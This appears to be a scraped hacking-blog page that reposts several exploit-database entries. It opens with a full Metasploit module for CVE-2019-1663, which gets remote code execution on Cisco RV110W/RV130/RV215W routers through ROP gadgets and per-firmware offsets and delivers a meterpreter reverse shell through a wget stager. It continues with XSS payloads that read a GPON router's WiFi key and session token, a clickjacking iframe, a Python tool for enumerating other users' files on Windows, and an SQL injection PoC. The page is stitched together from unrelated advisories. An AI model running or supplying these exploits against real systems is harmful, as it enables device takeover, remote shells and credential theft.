##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# linux/armle/meterpreter/bind_tcp -> segfault
# linux/armle/meterpreter/reverse_tcp -> segfault
# linux/armle/meterpreter_reverse_http -> works
# linux/armle/meterpreter_reverse_https -> works
# linux/armle/meterpreter_reverse_tcp -> works
# linux/armle/shell/bind_tcp -> segfault
# linux/armle/shell/reverse_tcp -> segfault
# linux/armle/shell_bind_tcp -> segfault
# linux/armle/shell_reverse_tcp -> segfault
#
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Deprecated
moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',
'Description' => %q{
A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,
Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router
could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.
RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.
RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.
Note: successful exploitation may not result in a session, and as such,
on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
},
'Author' =>
[
'Yu Zhang', # Initial discovery (GeekPwn conference)
'Haoliang Lu', # Initial discovery (GeekPwn conference)
'T. Shiomitsu', # Initial discovery (Pen Test Partners)
'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
],
'License' => MSF_LICENSE,
'Platform' => %w[linux],
'Arch' => [ARCH_ARMLE, ARCH_MIPSLE],
'SessionTypes' => %w[meterpreter],
'CmdStagerFlavor' => %w{ wget },
'Privileged' => true, # BusyBox
'References' =>
[
['CVE', '2019-1663'],
['BID', '107185'],
['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']
],
'DefaultOptions' => {
'WfsDelay' => 10,
'SSL' => true,
'RPORT' => 443,
'CMDSTAGER::FLAVOR' => 'wget',
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
},
'Targets' =>
[
[ 'Cisco RV110W 1.1.0.9',
{
'offset' => 69,
'libc_base_addr' => 0x2af06000,
'libcrypto_base_addr' => 0x2ac01000,
'system_offset' => 0x00050d40,
'got_offset' => 0x0009d560,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.0.9',
{
'offset' => 69,
'libc_base_addr' => 0x2af08000,
'libcrypto_base_addr' => 0x2ac03000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.0.10',
{
'offset' => 69,
'libc_base_addr' => 0x2af09000,
'libcrypto_base_addr' => 0x2ac04000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.1.4',
{
'offset' => 69,
'libc_base_addr' => 0x2af54000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV110W 1.2.1.7',
{
'offset' => 69,
'libc_base_addr' => 0x2af98000,
'libcrypto_base_addr' => 0x2ac4f000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV130/RV130W < 1.0.3.45',
{
'offset' => 446,
'libc_base_addr' => 0x357fb000,
'system_offset' => 0x0004d144,
'gadget1' => 0x00020e79, # pop {r2, r6, pc};
'gadget2' => 0x00041308, # mov r0, sp; blx r2;
'Arch' => ARCH_ARMLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
}
},
],
[ 'Cisco RV215W 1.1.0.5',
{
'offset' => 69,
'libc_base_addr' => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.1.0.6',
{
'offset' => 69,
'libc_base_addr' => 0x2af59000,
'libcrypto_base_addr' => 0x2ac54000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.2.0.14',
{
'offset' => 69,
'libc_base_addr' => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a001,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.2.0.15',
{
'offset' => 69,
'libc_base_addr' => 0x2af5f000,
'libcrypto_base_addr' => 0x2ac5a000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x00098db0,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.3.0.7',
{
'offset' => 77,
'libc_base_addr' => 0x2afeb000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x000a0530,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
[ 'Cisco RV215W 1.3.0.8',
{
'offset' => 77,
'libc_base_addr' => 0x2afee000,
'libcrypto_base_addr' => 0x2aca5000,
'system_offset' => 0x0004c7e0,
'got_offset' => 0x000a0530,
# gadget 1 is in /usr/lib/libcrypto.so
'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;
'Arch' => ARCH_MIPSLE,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',
}
}
],
],
'DisclosureDate' => 'Feb 27 2019',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SERVICE_DOWN, ],
},
))
end
def p(lib, offset)
[(lib + offset).to_s(16)].pack('H*').reverse
end
def prepare_shellcode(cmd)
case target
# RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7
# RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8
when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]
shellcode = rand_text_alpha(target['offset']) + # filler
rand_text_alpha(4) + # $s0
rand_text_alpha(4) + # $s1
rand_text_alpha(4) + # $s2
rand_text_alpha(4) + # $s3
p(target['libc_base_addr'], target['system_offset']) + # $s4
rand_text_alpha(4) + # $s5
rand_text_alpha(4) + # $s6
rand_text_alpha(4) + # $s7
rand_text_alpha(4) + # $s8
p(target['libcrypto_base_addr'], target['gadget1']) + # $ra
p(target['libc_base_addr'], target['got_offset']) +
rand_text_alpha(28) +
cmd
shellcode
when targets[5] # RV130/RV130W
shellcode = rand_text_alpha(target['offset']) + # filler
p(target['libc_base_addr'], target['gadget1']) +
p(target['libc_base_addr'], target['system_offset']) + # r2
rand_text_alpha(4) + # r6
p(target['libc_base_addr'], target['gadget2']) + # pc
cmd
shellcode
end
end
def send_request(buffer)
begin
send_request_cgi({
'uri' => '/login.cgi',
'method' => 'POST',
'vars_post' => {
"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": 0,
"change_action": "",
"enc": 1,
"user": rand_text_alpha_lower(5),
"pwd": buffer,
"sel_lang": "EN"
}
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
end
end
def check
# We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.
# We use lang_pack/EN.js because it's the one file that changes the most between versions.
# Note that it's not a smoking gun given that some branches keep the exact same files in /www
# (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x)
fingerprints = {
"69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => {
"version" => "Cisco RV110W 1.1.0.9",
"status" =>Exploit::CheckCode::Vulnerable
},
"8d3b677d870425198f7fae94d6cfe262551aa8bd" => {
"version" => "Cisco RV110W 1.2.0.9",
"status" => Exploit::CheckCode::Vulnerable
},
"134ee643ec877641030211193a43cc5e93c96a06" => {
"version" => "Cisco RV110W 1.2.0.10",
"status" => Exploit::CheckCode::Vulnerable
},
"e3b2ec9d099a3e3468f8437e5247723643ff830e" => {
"version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
},
"6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => {
"version" => "Cisco RV130/RV130W 1.0.0.21",
"status" => Exploit::CheckCode::Vulnerable
},
"9b1a87b752d11c5ba97dd80d6bae415532615266" => {
"version" => "Cisco RV130/RV130W 1.0.1.3",
"status" => Exploit::CheckCode::Vulnerable
},
"9b6399842ef69cf94409b65c4c61017c862b9d09" => {
"version" => "Cisco RV130/RV130W 1.0.2.7",
"status" => Exploit::CheckCode::Vulnerable
},
"8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => {
"version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16",
"status" => Exploit::CheckCode::Vulnerable
},
"8c8e05de96810a02344d96588c09b21c491ede2d" => {
"version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
},
"2f29a0dfa78063d643eb17388e27d3f804ff6765" => {
"version" => "Cisco RV215W 1.1.0.5",
"status" => Exploit::CheckCode::Vulnerable
},
"e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => {
"version" => "Cisco RV215W 1.1.0.6",
"status" => Exploit::CheckCode::Vulnerable
},
"7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => {
"version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15",
"status" => Exploit::CheckCode::Vulnerable
},
"050d47ea944eaeadaec08945741e8e380f796741" => {
"version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)",
"status" => Exploit::CheckCode::Unknown
}
}
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'lang_pack/EN.js')
})
if res && res.code == 200
fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}")
if fingerprints.key?(fingerprint)
print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}")
return fingerprints[fingerprint]["status"]
else
print_status("Couldn't reliably fingerprint the target.")
end
end
Exploit::CheckCode::Unknown
end
def exploit
print_status('Sending request')
execute_cmdstager
end
def execute_command(cmd, opts = {})
shellcode = prepare_shellcode(cmd.to_s)
send_request(shellcode)
end
def on_new_session(session)
# Given there is no process continuation here, the httpd server will stop
# functioning properly and we need to take care of proper restart
# ourselves.
print_status("Reloading httpd service")
reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
if session.type.to_s.eql? 'meterpreter'
session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
else
session.shell_command(reload_httpd_service)
end
ensure
super
end
end
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863594882
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Multiple Cross-Site Scripting (XSS) in the web interface of DASAN Zhone ZNID GPON 2426A EU version S3.1.285 application allows a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameters.
# Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU
# Date: 31.03.2019
# Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl
# Vendor Homepage: https://dasanzhone.com
# Version: <= S3.1.285
# Alternate Version: <= S3.0.738
# Tested on: version S3.1.285 (alternate version S3.0.738)
# CVE : CVE-2019-10677
= Reflected Cross-Site Scripting (XSS) =
http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp
= Stored Cross-Site Scripting (XSS) =
* WiFi network plaintext password
http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);//
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);//
* CSRF token
http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);//
= Clickjacking =
<html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NTFS-PRIVILEGED-FILE-ACCESS-ENUMERATION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Windows NTFS
NTFS is a proprietary journaling file system developed by Microsoft. Starting with Windows NT 3.1, it is the default file system of the Windows NT family.
[Vulnerability Type]
Privileged File Access Enumeration
[CVE Reference]
N/A
[Security Issue]
Attackers possessing user-only rights can gather intelligence or profile other user account activities by brute forcing a correct file name.
This is possible because Windows returns inconsistent error messages when accessing unauthorized files that contain a valid extension
or have a "." (dot) as part of the file or folder name.
Typically, you see enumeration in web-application attacks which target account usernames. In this case we are targeting the filenames
of other users, maybe we need to locate files up front that we wish to steal possibly prior to launching say an XXE exploit to steal
those files or maybe we just passively sniff the accounts directories to profile the mark and or learn their daily activities.
Standard account users attempting to open another users files or folders that do not contain a valid extension or dot "." in its filename
are always issued the expected "Access is denied" system error message.
However, for files that contain a (dot) in the filename and that also don't exist, the system echoes the following attacker friendly warning:
"The system cannot find the file".
This error message inconsistency allows attackers to infer files EXIST, because any other time we would get "The system cannot find the file".
Example, the Windows commands DIR or TYPE always greet attackers with an expected "Access is denied" message, whether the file exists or not.
This helps protect users from having their local files known to attackers, since the system returns the same message regardless if files
exist or not when using those commands. Those commands output messages are not affected by the file having a valid extension or not.
However, we can bypass that protection by avoiding the Windows DIR or TYPE commands and instead attempt to directly open any inaccessible
users file on the command line much like calling a program and pressing the enter key.
After the Win32 API function CreateFile is called an it returns either:
1) "The system cannot find the file"
2) "Access is denied"
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Hubert Dingleberry.contact
The system cannot find the file <==== DOES NOT EXIST
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.contact
Access is denied. <===== EXISTS
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\Toolio McDoucheLeroy.con
The system cannot find the file <==== DOES NOT EXIST
C:\Users\noprivs>c:\Users\privileged-victim\Contacts\whatever
Access is denied. <===== FALSE POSITIVE NO EXTENSION PRESENT IN THE FILENAME
From a defensive perspective we can leverage this to try to detect basic IOC and malware artifacts like .tmp, .ini, .dll, .exe
or related config files on disk with user-only rights, instead of authenticating with admin rights as a quick paranoid first pass.
Example, if malware hides itself by unlinking themselves from the EPROCESS list in memory or using programs like WinRAP to hide
processess from Windows TaskMgr, we may not discover them even if using tasklist command. The EPROCESS structure and flink/blink is
how Windows TaskMgr shows all running processes. However, we may possibly detect them by testing for the correct IOC name if the
malicious code happens to reside on disk and not only in memory. Whats cool is we can be do this without the need for admin rights.
Other Windows commands that will also let us confirm file existence by comparing error messages are start, call, copy, icalcs, and cd.
However, Windows commands rename, ren, cacls, type, dir, erase, move or del commands will issue flat out "Access is denied" messages.
Previously, MSRC recommended using ABE. However, that feature is only for viewing files and folders in a shared folder, not when viewing
files or folders in the local file system.
Tested successfully Win7/10
[Exploit/POC]
"NtFileSins.py"
from subprocess import Popen, PIPE
import sys,argparse,re
# NtFileSins v2.1
# Added: Check for Zone.Identifer:$DATA to see if any identified files were downloaded from internet.
# Fixed: save() logic to log report in case no Zone.Identifiers found.
#
# Windows File Enumeration Intel Gathering.
# Standard users can prove existence of privileged user artifacts.
#
# Typically, the Windows commands DIR or TYPE hand out a default "Access Denied" error message,
# when a file exists or doesn't exist, when restricted access is attempted by another user.
#
# However, accessing files directly by attempting to "open" them from cmd.exe shell,
# we can determine existence by compare inconsistent Windows error messages.
#
# Requirements: 1) target users with >= privileges (not admin to admin).
# 2) artifacts must contain a dot "." or returns false positives.
#
# Windows message "Access Denied" = Exists
# Windows message "The system cannot find the file" = Not exists
# Windows returns "no message" OR "c:\victim\artifact is not recognized as an internal or external command,
# operable program or batch file" = Admin to Admin so this script is not required.
#
# Profile other users by compare ntfs error messages to potentially learn their activities or machines purpose.
# For evil or maybe check for basic malware IOC existence on disk with user-only rights.
#
#======================================================================#
# NtFileSins.py - Windows File Enumeration Intel Gathering Tool v2.1 #
# By John Page (aka hyp3rlinx) #
# Apparition Security #
#======================================================================#
BANNER='''
_ _______________ __ _____ _
/ | / /_ __/ ____(_) /__ / ___/(_)___ _____
/ |/ / / / / /_ / / / _ \\__ \ / / __ \/ ___/
/ /| / / / / __/ / / / __/__/ / / / / (__ )
/_/ |_/ /_/ /_/ /_/_/\___/____/_/_/ /_/____/ v2.1
By hyp3rlinx
ApparitionSec
'''
sin_cnt=0
internet_sin_cnt=0
found_set=set()
zone_set=set()
ARTIFACTS_SET=set()
ROOTDIR = "c:/Users/"
ZONE_IDENTIFIER=":Zone.Identifier:$DATA"
USER_DIRS=["Contacts","Desktop","Downloads","Favorites","My Documents","Searches","Videos/Captures",
"Pictures","Music","OneDrive","OneDrive/Attachments","OneDrive/Documents"]
APPDATA_DIR=["AppData/Local/Temp"]
EXTS = set([".contact",".url",".lnk",".search-ms",".exe",".csv",".txt",".ini",".conf",".config",".log",".pcap",".zip",".mp4",".mp3", ".bat",
".wav",".docx",".pptx",".reg",".vcf",".avi",".mpg",".jpg",".jpeg",".png",".rtf",".pdf",".dll",".xml",".doc",".gif",".xls",".wmv"])
REPORT="NtFileSins_Log.txt"
def usage():
print "NtFileSins is a privileged file access enumeration tool to search multi-account artifacts without admin rights.\n"
print '-u victim -d Searches -a "MS17-020 - Google Search.url"'
print '-u victim -a "<name.ext>"'
print "-u victim -d Downloads -a <name.ext> -s"
print '-u victim -d Contacts -a "Mike N.contact"'
print "-u victim -a APT.txt -b -n"
print "-u victim -d -z Desktop/MyFiles -a <.name>"
print "-u victim -d Searches -a <name>.search-ms"
print "-u victim -d . -a <name.ext>"
print "-u victim -d desktop -a inverted-crosses.mp3 -b"
print "-u victim -d Downloads -a APT.exe -b"
print "-u victim -f list_of_files.txt"
print "-u victim -f list_of_files.txt -b -s"
print "-u victim -f list_of_files.txt -x .txt"
print "-u victim -d desktop -f list_of_files.txt -b"
print "-u victim -d desktop -f list_of_files.txt -x .rar"
print "-u victim -z -s -f list_of_files.txt"
def parse_args():
parser.add_argument("-u", "--user", help="Privileged user target")
parser.add_argument("-d", "--directory", nargs="?", help="Specific directory to search <e.g. Downloads>.")
parser.add_argument("-a", "--artifact", help="Single artifact we want to verify exists.")
parser.add_argument("-t", "--appdata", nargs="?", const="1", help="Searches the AppData/Local/Temp directory.")
parser.add_argument("-f", "--artifacts_from_file", nargs="?", help="Enumerate a list of supplied artifacts from a file.")
parser.add_argument("-n", "--notfound", nargs="?", const="1", help="Display unfound artifacts.")
parser.add_argument("-b", "--built_in_ext", nargs="?", const="1", help="Enumerate files using NtFileSin built-in ext types, if no extension is found NtFileSins will switch to this feature by default.")
parser.add_argument("-x", "--specific_ext", nargs="?", help="Enumerate using specific ext, e.g. <.exe> using a supplied list of artifacts, a supplied ext will override any in the supplied artifact list.")
parser.add_argument("-z", "--zone_identifier", nargs="?", const="1", help="Identifies artifacts downloaded from the internet by checking for Zone.Identifier:$DATA.")
parser.add_argument("-s", "--save", nargs="?", const="1", help="Saves successfully enumerated artifacts, will log to "+REPORT)
parser.add_argument("-v", "--verbose", nargs="?", const="1", help="Displays the file access error messages.")
parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show example usage.")
return parser.parse_args()
def access(j):
result=""
try:
p = Popen([j], stdout=PIPE, stderr=PIPE, shell=True)
stderr,stdout = p.communicate()
result = stdout.strip()
except Exception as e:
#print str(e)
pass
return result
def artifacts_from_file(artifacts_file, bflag, specific_ext):
try:
f=open(artifacts_file, "r")
for a in f:
idx = a.rfind(".")
a = a.strip()
if a != "":
if specific_ext:
if idx==-1:
a = a + specific_ext
else:
#replace existing ext
a = a[:idx] + specific_ext
if bflag:
ARTIFACTS_SET.add(a)
else:
ARTIFACTS_SET.add(a)
f.close()
except Exception as e:
print str(e)
exit()
def save():
try:
f=open(REPORT, "w")
for j in found_set:
f.write(j+"\n")
f.close()
except Exception as e:
print str(e)
def recon_msg(s):
if s == 0:
return "Access is denied."
else:
return "\t[*] Artifact exists ==>"
def echo_results(args, res, x, i):
global sin_cnt
if res=="":
print "\t[!] No NTFS message, you must already be admin, then this script is not required."
exit()
if "not recognized as an internal or external command" in res:
print "\t[!] You must target users with higher privileges than yours."
exit()
if res != recon_msg(0):
if args.verbose:
print "\t"+res
else:
if args.notfound:
print "\t[-] not found: " + x +"/"+ i
else:
sin_cnt += 1
if args.save or args.zone_identifier:
found_set.add(x+"/"+i)
if args.verbose:
print recon_msg(1)+ x+"/"+i
print "\t"+res
else:
print recon_msg(1)+ x+"/"+i
def valid_artifact_name(sin,args):
idx = "." in sin
if re.findall(r"[/\\*?:<>|]", sin):
print "\t[!] Skipping: disallowed file name character."
return False
if not idx and not args.built_in_ext and not args.specific_ext:
print "\t[!] Warning: '"+ sin +"' has no '.' in the artifact name, this can result in false positives."
print "\t[+] Searching for '"+ sin +"' using built-in ext list to prevent false positives."
if not args.built_in_ext:
if sin[-1] == ".":
print "\t[!] Skipping: "+sin+" non valid file name."
return False
return True
def search_missing_ext(path,args,i):
for x in path:
for e in EXTS:
res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
echo_results(args, res, x, i+e)
#Check if the found artifact was downloaded from internet
def zone_identifier_check(args):
global ROOTDIR, internet_sin_cnt
zone_set.update(found_set)
for c in found_set:
c = c + ZONE_IDENTIFIER
res = access(ROOTDIR+args.user+"/"+c)
if res == "Access is denied.":
internet_sin_cnt += 1
print "\t[$] Zone Identifier found: "+c+" this file was downloaded over the internet!."
zone_set.add(c)
def ntsins(path,args,i):
if i.rfind(".")==-1:
search_missing_ext(path,args,i)
i=""
for x in path:
if i != "":
if args.built_in_ext:
for e in EXTS:
res = access(ROOTDIR+args.user+"/"+x+"/"+i+e)
echo_results(args, res, x, i+e)
elif args.specific_ext:
idx = i.rfind(".")
if idx == -1:
i = i + "."
else:
i = i[:idx] + args.specific_ext
res = access(ROOTDIR+args.user+"/"+x+"/"+i)
echo_results(args, res, x, i)
def search(args):
print "\tSearching...\n"
global ROOTDIR, USER_DIRS, ARTIFACTS_SET
if args.artifact:
ARTIFACTS_SET = set([args.artifact])
for i in ARTIFACTS_SET:
idx = i.rfind(".") + 1
if idx and args.built_in_ext:
i = i[:idx -1:None]
if len(i) > 0 and i != None:
if valid_artifact_name(i,args):
#specific user dir search
if args.directory:
single_dir=[args.directory]
ntsins(single_dir,args,i)
#search appdata dirs
elif args.appdata:
ntsins(APPDATA_DIR,args,i)
#all default user dirs
else:
ntsins(USER_DIRS,args,i)
def check_dir_input(_dir):
if len(re.findall(r":", _dir)) != 0:
print "[!] Check the directory arg, NtFileSins searches under c:/Users/target by default see Help -h."
return False
return True
def main(args):
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
if args.examples:
usage()
exit()
if not args.user:
print "[!] No target user specified see Help -h"
exit()
if args.appdata and args.directory:
print "[!] Multiple search directories supplied see Help -h"
exit()
if args.specific_ext:
if "." not in args.specific_ext:
print "[!] Must use full extension e.g. -x ."+args.specific_ext+", dot in filenames mandatory to prevent false positives."
exit()
if args.artifact and args.artifacts_from_file:
print "[!] Multiple artifacts specified, use just -f or -a see Help -h"
exit()
if args.built_in_ext and args.specific_ext:
print "\t[!] Both specific and built-in extensions supplied, use only one."
exit()
if args.specific_ext and not args.artifacts_from_file:
print "\t[!] -x to be used with -f flag only see Help -h."
exit()
if args.artifact:
if args.artifact.rfind(".")==-1:
print "\t[!] Artifacts must contain a .ext or will result in false positives."
exit()
if args.directory:
if not check_dir_input(args.directory):
exit()
if args.artifacts_from_file:
artifacts_from_file(args.artifacts_from_file, args.built_in_ext, args.specific_ext)
if not args.artifact and not args.artifacts_from_file:
print "[!] Exiting, no artifacts supplied see Help -h"
exit()
else:
search(args)
if sin_cnt >= 1 and args.zone_identifier:
zone_identifier_check(args)
if args.save and len(found_set) != 0 and not args.zone_identifier:
save()
if args.save and len(zone_set) != 0:
found_set.update(zone_set)
save()
print "\n\tNtFileSins Detected "+str(sin_cnt)+ " out of %s" % str(len(ARTIFACTS_SET)) + " Sins.\n"
if args.zone_identifier and internet_sin_cnt >= 1:
print "\t"+str(internet_sin_cnt) + " of the sins were internet downloaded.\n"
if not args.notfound:
print "\tuse -n to display unfound enumerated files."
if not args.built_in_ext:
print "\tfor extra search coverage try -b flag or targeted artifact search -a."
if __name__ == "__main__":
print BANNER
parser = argparse.ArgumentParser()
main(parse_args())
[POC Video URL]
https://www.youtube.com/watch?v=rm8kEbewqpI
[Network Access]
Remote/Local
[Severity]
Low
[Disclosure Timeline]
Vendor Notification: July 29, 2019
MSRC "does not meet the bar for security servicing" : July 29, 2019
September 5, 2019 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
# Exploit Title: Inventory Webapp SQL injection
# Data: 05.09.2019
# Exploit Author: mohammad zaheri
# Vendor HomagePage: https://github.com/edlangley/inventory-webapp
# Tested on: Windows
# Google Dork: N/A
=========
Vulnerable Page:
=========
/php/add-item.php
==========
Vulnerable Source:
==========
Line39: $name = $_GET["name"];
Line39: $description = $_GET["description"];
Line39: $quantity = $_GET["quantity"];
Line39: $cat_id = $_GET["cat_id"];
Line49: if(mysql_query($itemquery, $conn))
=========
POC:
=========
http://site.com/php/add-item.php?itemquery=[SQL]
=========
Contact Me :
=========
